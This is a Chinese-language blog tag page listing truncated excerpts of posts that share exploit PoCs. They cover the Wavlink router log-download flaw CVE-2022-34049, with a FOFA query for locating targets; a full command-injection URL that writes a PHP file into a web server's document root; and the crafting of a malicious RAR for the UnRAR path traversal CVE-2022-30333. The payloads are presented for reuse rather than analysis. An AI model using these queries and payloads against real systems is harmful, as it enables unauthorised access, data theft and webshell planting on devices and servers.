标签「poc」下的文章 - xiaohack's Blog

学python得永生，python大法好之利用python编写CVE-2022-34049 poc
2022-08-10

漏洞说明Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题，未经验证的攻击者可以下载日志文件和配置数据。影响版本Wavlink WN530HG4 M30HG4.V5030.191116漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportLogs.shPOC#!/usr/bin...

搬运几个近期poc
2022-08-01

某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[...

CVE-2022-30333 poc中的rar如何构造
2022-07-06

1. 描述UnRAR二进制文件中的路径遍历漏洞（CVE-2022-30333）在github 公布项目poc中(地址：https://github.com/TheL1ghtVn/CVE-2022-30333-PoC)，存在rar的poc。通过winhex打开可见，一个rar中存在俩个同名为，sym的文件夹查询资料，得到构造rar需求如下，需要一个rar中放置一个sl软连接，和一个sl的文...

回到顶部